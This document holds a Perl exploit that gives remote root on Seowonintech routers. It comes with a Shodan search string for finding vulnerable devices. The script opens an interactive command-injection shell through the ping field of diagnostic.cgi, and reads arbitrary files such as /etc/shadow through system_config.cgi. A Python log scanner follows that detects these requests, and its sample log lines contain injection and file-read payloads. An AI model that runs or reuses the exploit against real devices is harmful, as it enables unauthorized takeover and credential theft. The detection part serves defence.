```perl
#!/usr/bin/perl
#
#  [+] Seowonintech all device remote root exploit v2
#  =====================================================
#  author:                | email:
#  Todor Donev(latin)     | todor dot donev
#  Тодор Донев(cyrillic)  | @googlemail.com
#  =====================================================
#  type:     | platform:     | description:
#  remote    | linux         | attacker can get root
#  hardware  | seowonintech  | access on the device
#  =====================================================
#  greetings to:
#  Stiliyan Angelov,Tsvetelina Emirska,all elite
#  colleagues and all my friends that support me.
#  =====================================================
#  warning:
#  Results about 37665 possible vulnerabilities
#  from this exploit.
#  =====================================================
#  shodanhq dork:
#  thttpd/2.25b 29dec2003 Content-Length: 386 Date: 2013
#  =====================================================
#  P.S. Sorry for buggy perl.. :)
#  2o13 Hell yeah from Bulgaria, Sofia
#
#  Stop Monsanto Stop Monsanto Stop Monsanto
#
#  FREE GOTTFRID SVARTHOLM WARG FREE
#  GOTTFRID SVARTHOLM WARG is THEPIRATEBAY co-founder
#  who was sentenced to two years in jail by Nacka
#  district court, Sweden on 18.06.2013 for hacking into
#  computers at a company that manages data for Swedish
#  authorities and making illegal online money transfers.

use LWP::Simple qw/$ua get/;
my $host=$ARGV[0] =~ /^http:\/\// ?$ARGV[0]:'http://' . $ARGV[0];
if(not defined $ARGV[0])
{
    usg();
    exit;
}
print "[+] Seowonintech all device remote root exploit\n";
$diagcheck = $host."/cgi-bin/diagnostic.cgi";
$syscheck = $host."/cgi-bin/system_config.cgi";
$res = $ua->get($diagcheck) || die "[-] Error: $!\n";
print "[+] Checking before attack..\n";
if($res->status_line != 200){
    print "[+] diagnostic.cgi Status: ".$res->status_line."\n";
}else{
    print "[o] Victim is ready for attack.\n";
    print "[o] Status: ".$res->status_line."\n";
    if(defined $res =~ m{selected>4</option>}sx){
        print "[+] Connected to $ARGV[0]\n";
        print "[+] The fight for the future Begins\n";
        print "[+] Exploiting via remote command execution..\n";
        print "[+] Permission granted, old friend.\n";
        &rce;
    }else{
        print "[!] Warning: possible vulnerability.\n";
        exit;
    }
}
$res1 = $ua->get($syscheck) || die "[-] Error: $!\n";
if($res1->status_line != 200){
    print "[+] system_config.cgi Status: ".$res1->status_line."\n";
    exit;
}else{
    print "[+] Trying to attack via remote file disclosure release.\n";
    if(defined $syscheck =~ s/value=\'\/etc\/\'//gs){
        print "[+] Victim is ready for attack.\n";
        print "[+] Connected to $ARGV[0]\n";
        print "[o] Follow the white cat.\n";
        print "[+] Exploiting via remote file dislocure..\n";
        print "[+] You feeling lucky, Neo?\n";
        &rfd;
    }else{
        print "[!] Warning: Possible vulnerability. Believe the unbelievable!\n";
        exit;
    }
}
sub rfd{
    while(1){
        print "# cat ";
        chomp($file=<STDIN>);
        if($file eq ""){ print "Enter full path to file!\n"; }
        $bug = $host."/cgi-bin/system_config.cgi?file_name=".$file."&btn_type=load&action=APPLY";
        $data=get($bug) || die "[-] Error: $ARGV[0] $!\n";
        $data =~ s/Null/File not found!/gs;
        if (defined $data =~ m{rows="30">(.*?)</textarea>}sx){
            print $1."\n";
        }
    }
}
sub rce{
    while(1){
        print "# ";
        chomp($rce=<STDIN>);
        $bug = $host."/cgi-bin/diagnostic.cgi?select_mode_ping=on&ping_ipaddr=-q -s 0 127.0.0.1;".$rce.";&ping_count=1&action=Apply&html_view=ping";
        $rce =~ s/\|/\;/;
        if($rce eq ""){print "enter Linux command\n";}
        if($rce eq "clear"){system $^O eq 'MSWin32' ? 'cls' : 'clear';}
        if($rce eq "exit" || $rce eq "quit"){print "There is no spoon...\n"; exit;}
        $data=get($bug) || die "[-] Error: $!\n";
        if (defined $data =~ m{(\s.*) Content-type:}sx){
            $result = substr $1, index($1, ' loss') or substr $1, index($1, ' ms');
            $result =~ s/ loss\n//;
            $result =~ s/ ms\n//;
            print $result;
        }
    }
}
sub usg
{
    print " [+] Seowonintech all device remote root exploit\n";
    print " [!] by Todor Donev todor dot donev @ googlemail.com\n";
    print " [?] usg: perl $0 <victim>\n";
    print " [?] exmp xpl USG: perl $0 192.168.1.1 :)\n";
    print " [1] exmp xpl RCE: # uname -a :)\n";
    print " [2] exmp xpl RFD: # cat /etc/webpasswd or /etc/shadow, maybe and /etc/passwd :P\n";
}
```
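A defensive counterpart to the script above, added here and not part of the original exploit or of any vendor code: Python that scans web server access logs for the two request shapes the script sends (shell metacharacters in `ping_ipaddr` on `diagnostic.cgi`, and a `file_name` load on `system_config.cgi`). The Common Log Format layout, the sample log lines, the function names, and the rule that an absolute or `..` path in `file_name` is suspicious are assumptions.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Request field of a Common Log Format line (assumed log layout).
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# Characters a ping target never needs but a shell interprets.
SHELL_META = re.compile(r"[;|&`$<>\n\r]")

def query_params(query):
    """Split on '&' only, so a ';' stays inside the value it was sent in."""
    params = {}
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        params.setdefault(unquote_plus(key), []).append(unquote_plus(value))
    return params

def classify(target):
    """Return a finding string for a request target, or None if nothing matches."""
    parts = urlsplit(target)
    params = query_params(parts.query)
    if parts.path.endswith("/cgi-bin/diagnostic.cgi"):
        if any(SHELL_META.search(v) for v in params.get("ping_ipaddr", [])):
            return "diagnostic.cgi: shell metacharacter in ping_ipaddr"
    if parts.path.endswith("/cgi-bin/system_config.cgi"):
        names = params.get("file_name", [])
        # Assumption: absolute or parent-relative paths are never legitimate here.
        if "load" in params.get("btn_type", []) and any(
                n.startswith("/") or ".." in n for n in names):
            return "system_config.cgi: file_name load of absolute or traversal path"
    return None

def scan(lines):
    """Return (client_address, finding) for every log line that matches a rule."""
    findings = []
    for line in lines:
        m = REQUEST_RE.search(line)
        reason = classify(m.group("target")) if m else None
        if reason:
            findings.append((line.split()[0], reason))
    return findings

# Constructed sample lines (documentation addresses), not captured traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jul/2013:10:00:01 +0000] "GET /cgi-bin/diagnostic.cgi?select_mode_ping=on&ping_ipaddr=192.0.2.1&ping_count=1&action=Apply&html_view=ping HTTP/1.1" 200 386',
    '198.51.100.7 - - [01/Jul/2013:10:02:13 +0000] "GET /cgi-bin/diagnostic.cgi?select_mode_ping=on&ping_ipaddr=-q%20-s%200%20127.0.0.1;uname%20-a;&ping_count=1&action=Apply&html_view=ping HTTP/1.1" 200 412',
    '198.51.100.7 - - [01/Jul/2013:10:02:40 +0000] "GET /cgi-bin/system_config.cgi?file_name=/etc/passwd&btn_type=load&action=APPLY HTTP/1.1" 200 1024',
    '192.0.2.10 - - [01/Jul/2013:10:05:00 +0000] "GET /index.html HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for client, reason in scan(SAMPLE_LOG):
        print(client, reason)
```

Both CGI endpoints answered these requests without any login step in the script above, so a match from an address outside the management network is worth treating as an incident rather than as noise.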